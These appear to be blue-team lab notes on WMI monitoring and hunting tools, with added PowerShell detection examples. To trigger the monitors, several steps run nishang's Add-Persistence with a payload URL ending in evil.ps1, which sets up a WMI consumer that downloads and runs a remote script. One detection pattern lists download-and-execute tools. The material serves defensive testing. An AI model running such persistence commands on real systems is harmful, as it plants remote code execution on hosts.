WMI Blue Team tools

WMIMon -> tool to monitor WMI activity:

https://github.com/luctalpe/WMIMon

Real-time event trace log (ETL) consumer for the WMI-Activity provider; run it on the host you want to watch (here 192.168.222.130).

PS C:\Users\victim6\Downloads\WMIMon-master\WMIMon-master\Downloads\WMIMon_Binaries> .\WMIMon.exe

In another PS session, trigger a remote WMI process creation against the monitored host:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Invoke-WmiMethod -Class win32_process -name create -ArgumentList calc.exe -ComputerName 192.168.222.130

Back in the WMIMon session the connection and the Win32_Process Create call are shown. A query is logged as well:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Get-WmiObject -class win32_computersystem
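The same signal WMIMon surfaces, pulled out of the Microsoft-Windows-WMI-Activity provider with built-in cmdlets, as an added example that is not part of WMIMon or of the original notes. It assumes the analytic Trace channel has been enabled (wevtutil sl Microsoft-Windows-WMI-Activity/Trace /e:true) and that its operation events carry a "Key = Value; Key = Value" message of the shape modelled in the constructed samples below; the function names and the ATTACKER-PC machine name are mine. The remote-client check is what separates lateral movement from local WMI use.

```powershell
# Added example (not WMIMon code): parse WMI-Activity operation messages and keep only
# ExecMethod calls that came from a machine other than the local one.

function ConvertFrom-WmiActivityMessage {
    # Turn "CorrelationId = ...; Operation = ...; ClientMachine = ..." into an object.
    param([Parameter(Mandatory)][string]$Message)
    $fields = @{}
    foreach ($pair in ($Message -split ';')) {
        if ($pair -match '^\s*(\w+)\s*=\s*(.*?)\s*$') { $fields[$Matches[1]] = $Matches[2] }
    }
    [pscustomobject]$fields
}

function Find-RemoteWmiExecMethod {
    # Win32_Process::Create via IWbemServices::ExecMethod from a remote client is the
    # classic "wmic /node" or Invoke-WmiMethod -ComputerName lateral-movement footprint.
    param(
        [Parameter(Mandatory)][string[]]$Messages,
        [string]$LocalHost = $env:COMPUTERNAME
    )
    foreach ($m in $Messages) {
        $op = ConvertFrom-WmiActivityMessage -Message $m
        if (-not $op.Operation -or $op.Operation -notmatch 'ExecMethod') { continue }
        if ($op.ClientMachine -and $op.ClientMachine -ine $LocalHost) {
            [pscustomobject]@{
                ClientMachine = $op.ClientMachine
                User          = $op.User
                ClientPid     = $op.ClientProcessId
                Operation     = $op.Operation
            }
        }
    }
}

# Constructed sample messages (shape modelled on the WMI-Activity provider, not real captures).
$samples = @(
    'CorrelationId = {00000000-0000-0000-0000-000000000001}; GroupOperationId = 1; OperationId = 2; Operation = Start IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem; ClientMachine = DESKTOP-E622G7D; User = DESKTOP-E622G7D\victim6; ClientProcessId = 4120; NamespaceName = \\.\root\cimv2',
    'CorrelationId = {00000000-0000-0000-0000-000000000002}; GroupOperationId = 3; OperationId = 4; Operation = Start IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create; ClientMachine = ATTACKER-PC; User = ATTACKER-PC\victim6; ClientProcessId = 5520; NamespaceName = \\.\root\cimv2'
)

# Only the second sample (remote ExecMethod) is returned; the local ExecQuery is dropped.
Find-RemoteWmiExecMethod -Messages $samples -LocalHost 'DESKTOP-E622G7D' | Format-Table -AutoSize

# Live use once the Trace channel is enabled (analytic logs need -Oldest; run as Administrator):
# Get-WinEvent -LogName 'Microsoft-Windows-WMI-Activity/Trace' -Oldest |
#     Where-Object { $_.Message -match 'Operation = ' } |
#     ForEach-Object Message | Find-RemoteWmiExecMethod
```

The Trace channel is noisy and off by default, which is why a live ETW consumer like WMIMon is more convenient on a single host; the parser above is the piece to reuse when the events are forwarded to a SIEM.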

WMI_Monitor: tool to log new WMI consumers and processes.

https://github.com/realparisi/WMI_Monitor

It uses a WMI permanent event consumer of its own to monitor the creation of other consumers, so it survives reboots and needs no running PowerShell session.

New-EventSubscriberMonitor registers the subscription; each detection writes an entry with Event ID 8 to the Application event log with source WSH.

Also see PoshEventUI (a GUI for browsing and creating WMI event subscriptions):

https://github.com/proxb/PoshEventUI

PS C:\Users\victim6\Downloads\WMI_Monitor-master\WMI_Monitor-master> . .\WMIMonitor.ps1

PS C:\Users\victim6\Downloads\WMI_Monitor-master\WMI_Monitor-master> New-EventSubscriberMonitor

Test the monitor with nishang: clear any earlier persistence, then add a WMI-based one (this registers a permanent event consumer):

PS C:\Users\victim6\Downloads> cd .\new\new\tool\tool\nishang-master\nishang-master\Utility\

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Remove-Persistence.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Remove-Persistence -remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Add-Persistence.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Add-Persistence -PayloadURL http://192.168.222.130:443/evil.ps1

Now in Event Viewer (Application log, source WSH, Event ID 8) we can see the entries the monitor wrote.

Remove the monitor's own subscription when done:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Remove-SubscriberMonitor

Next tool: PoshEventUI. Go to the PoshEventUI-master folder.

https://github.com/proxb/PoshEventUI

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> cd C:\Users\victim6\Downloads\PoshEventUI-master\PoshEventUI-master

PS C:\Users\victim6\Downloads\PoshEventUI-master\PoshEventUI-master> . .\WMIEventUtility.ps1

In the GUI, click the New icon in the Consumer section to view or create consumers.

CimSweep: a suite of CIM/WMI-based tools for performing incident response and hunting operations remotely and at scale.

https://github.com/PowerShellMafia/CimSweep/tree/master/CimSweep

PS C:\Users\victim6\Downloads\PoshEventUI-master\PoshEventUI-master> cd C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> ls

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Import-Module .\CimSweep.psd1 -Verbose

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-CSService

Output is long (one object per installed service).

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-Command -module cimsweep

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-CSTypedURL

Every CimSweep cmdlet accepts -CimSession, so the same sweep runs against a remote host:

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> $sess = New-CimSession -ComputerName DESKTOP-E622G7D

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-CSTypedURL -CimSession $sess

Get-CSWmiPersistence lists permanent WMI event subscriptions (filters, consumers, bindings), locally and over the session:

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-CSWmiPersistence

PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> Get-CSWmiPersistence -CimSession $sess
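What Get-CSWmiPersistence automates, written out with plain Get-CimInstance so the three pieces of a permanent subscription are visible; this is an added example, not CimSweep's own code. The function names, the Get-RefName helper and the "suspicious" command patterns are my own choices, and the CIM session usage reuses the DESKTOP-E622G7D host from the notes above.

```powershell
# Added example (not CimSweep code): join __EventFilter, __EventConsumer and
# __FilterToConsumerBinding from root/subscription and flag likely persistence.

function Get-RefName {
    # Binding.Filter / Binding.Consumer arrive as CimInstance references (Name property)
    # from Get-CimInstance, or as object-path strings from older tooling.
    param($Ref)
    if ($Ref -is [string]) {
        if ($Ref -match 'Name="([^"]*)"') { return $Matches[1] }
        return $Ref
    }
    return $Ref.Name
}

function Get-WmiSubscriptionTriad {
    # Works locally or over an existing CIM session (-CimSession $sess), like CimSweep.
    param([Microsoft.Management.Infrastructure.CimSession]$CimSession)

    $cim = @{ Namespace = 'root/subscription' }
    if ($CimSession) { $cim.CimSession = $CimSession }

    $filters   = @(Get-CimInstance @cim -ClassName __EventFilter)
    $consumers = @(Get-CimInstance @cim -ClassName __EventConsumer)
    $bindings  = @(Get-CimInstance @cim -ClassName __FilterToConsumerBinding)

    # Patterns typical of download-and-execute consumers (nishang's Add-Persistence
    # consumer is a PowerShell one-liner that fetches -PayloadURL). Heuristic only.
    $badCmd = 'powershell|pwsh|-enc|downloadstring|downloadfile|iex|invoke-expression|mshta|wscript|cscript|regsvr32|rundll32|certutil|bitsadmin'

    foreach ($b in $bindings) {
        $fName = Get-RefName $b.Filter
        $cName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object Name -eq $fName | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $cName | Select-Object -First 1

        $cls = if ($c) { $c.CimClass.CimClassName } else { '<missing>' }
        $payload = switch ($cls) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { $c.ScriptText }
            'LogFileEventConsumer'      { $c.Filename }
            default                     { '' }
        }
        $suspicious = ($cls -in 'CommandLineEventConsumer','ActiveScriptEventConsumer') -and
                      ($payload -match $badCmd)

        [pscustomobject]@{
            Filter     = $fName
            Query      = if ($f) { $f.Query } else { '<missing>' }
            Consumer   = $cName
            Class      = $cls
            Payload    = $payload
            Suspicious = $suspicious
        }
    }
}

# Local sweep, then the same over a CIM session to the host from the notes.
Get-WmiSubscriptionTriad | Format-Table -AutoSize
# $sess = New-CimSession -ComputerName DESKTOP-E622G7D
# Get-WmiSubscriptionTriad -CimSession $sess | Where-Object Suspicious
```

A binding whose filter or consumer shows as <missing> is worth a second look too: attackers sometimes delete one leg to break naive tooling, and legitimate software rarely leaves dangling bindings.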


WMI-IDS: a proof-of-concept agentless host intrusion detection system (part of FireEye's flare-wmi):

https://github.com/fireeye/flare-wmi/tree/master/WMI-IDS

Useful for detecting persistence mechanisms and raising alerts based on triggers.


PS C:\Users\victim6\Downloads\CimSweep-master\CimSweep-master\CimSweep> cd C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> dir

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> Import-Module .\WMI_IDS.psm1 -Verbose

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> Get-WMIPersistenceItem

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> help Register-Alert -Examples

Raise an alert (an event log entry) whenever a CommandLineEventConsumer is created:

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> New-AlertTrigger -EventConsumer CommandLineEventConsumer -TriggerType Creation | New-AlertAction -EventLogEntry | Register-Alert

Event Viewer shows no new entries yet, since nothing has created a consumer. Remove the earlier nishang persistence and add it again to fire the trigger:

PS C:\Users\victim6\Downloads\flare-wmi-master\flare-wmi-master\WMI-IDS> Remove-Persistence -Remove

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> Add-Persistence -PayloadURL http://192.168.222.132/evil.ps1 -verbose

Now a new entry appears in Event Viewer: the consumer registered by Add-Persistence matched the Creation trigger.
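The detection both WMI_Monitor and WMI-IDS build on, written out as an added example that is not the code of either project: a watch on root/subscription that writes an Application-log entry whenever a permanent event consumer or a filter-to-consumer binding is created, plus a harmless fixture to fire it. The event source name, event ID 8, the WITHIN interval and the fixture names are my own choices; it must run as Administrator.

```powershell
# Added example (not WMI_Monitor or WMI-IDS code): session-scoped consumer-creation watch.

$Source = 'WmiConsumerMonitor'   # custom event source, created on first use
if (-not [System.Diagnostics.EventLog]::SourceExists($Source)) {
    New-EventLog -LogName Application -Source $Source
}

# Intrinsic creation events on the subscription classes; ISA '__EventConsumer' covers every
# consumer type. WITHIN is the poll interval in seconds, so detection lags by up to that much.
$query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
         "WHERE TargetInstance ISA '__EventConsumer' OR TargetInstance ISA '__FilterToConsumerBinding'"

$action = {
    $ti  = $Event.SourceEventArgs.NewEvent.TargetInstance
    $cls = $ti.CimClass.CimClassName
    $detail = switch ($cls) {
        'CommandLineEventConsumer'  { "Name=$($ti.Name) Cmd=$($ti.CommandLineTemplate)" }
        'ActiveScriptEventConsumer' { "Name=$($ti.Name) Script=$($ti.ScriptText)" }
        '__FilterToConsumerBinding' { "Filter=$($ti.Filter) Consumer=$($ti.Consumer)" }
        default                     { "Name=$($ti.Name)" }
    }
    # The action runs in its own scope; MessageData carries the source name in.
    Write-EventLog -LogName Application -Source $Event.MessageData -EntryType Warning `
        -EventId 8 -Message "New WMI $cls created: $detail"
}

Register-CimIndicationEvent -Namespace root/subscription -Query $query `
    -SourceIdentifier 'WmiConsumerWatch' -MessageData $Source -Action $action | Out-Null

# Fixture: a consumer with no binding, so it can never run, but its creation is exactly
# what the watch looks for (Add-Persistence does the same with a real payload).
$fixture = New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer `
    -Property @{ Name = 'MonitorSelfTest'; CommandLineTemplate = 'cmd.exe /c exit 0' }

Start-Sleep -Seconds 10   # longer than the WITHIN interval
Get-EventLog -LogName Application -Source $Source -Newest 5 |
    Format-Table TimeGenerated, EventID, Message -AutoSize

# Clean up the fixture and the watch (the watch would die with the session anyway).
Remove-CimInstance -InputObject $fixture
Unregister-Event -SourceIdentifier 'WmiConsumerWatch'
```

Register-CimIndicationEvent creates a temporary subscription, which is the trade-off against WMI_Monitor: nothing is left in the repository, but the watch ends when the PowerShell session does. For a no-tooling baseline, Windows 10 and Server 2016 onward also record permanent consumer registration natively as Event ID 5861 in Microsoft-Windows-WMI-Activity/Operational.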

Other tools in the same space:

Uproot (WMI-based intrusion detection):

https://github.com/invoke-IR/uproot/

Kansa (PowerShell incident response framework):

https://github.com/davehull/kansa/

@Saksham Dixit